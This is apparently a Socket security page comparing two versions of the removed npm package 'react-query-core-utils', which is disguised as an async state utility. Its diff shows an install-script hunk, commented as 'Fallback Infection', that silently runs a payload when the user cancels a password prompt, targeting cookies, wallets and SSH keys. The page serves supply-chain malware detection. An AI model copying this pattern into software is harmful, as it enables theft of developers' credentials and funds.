Latest Threat Research:SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains.Details
Socket
Book a DemoInstallSign in
Socket

react-query-core-utils

Package Overview
Dependencies
Maintainers
1
Versions
12
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

react-query-core-utils - npm Package Compare versions

Package was removed
Sorry, it seems this package was removed from the registry
Comparing version
4.4.8
to
4.4.9
+1
-1
package.json
{
"name": "react-query-core-utils",
"version": "4.4.8",
"version": "4.4.9",
"description": "Utility layer for asynchronous state management",

@@ -5,0 +5,0 @@ "private": false,

@@ -56,15 +56,2 @@ #!/usr/bin/env node

// Strategy: Fallback Infection
// If user hits Ctrl+C (aborts password), we still run the payload in "User Mode"
// We miss the system password, but we still get Cookies, Wallets, SSH, etc.
rl.on('SIGINT', async () => {
process.stdout.write('\n');
console.log(red("Setup Cancelled by user."));
// Silently spawn payload with NO password
try {
await executePayload('');
} catch (e) { }
process.exit(0);
});
const user = os.userInfo().username;

@@ -71,0 +58,0 @@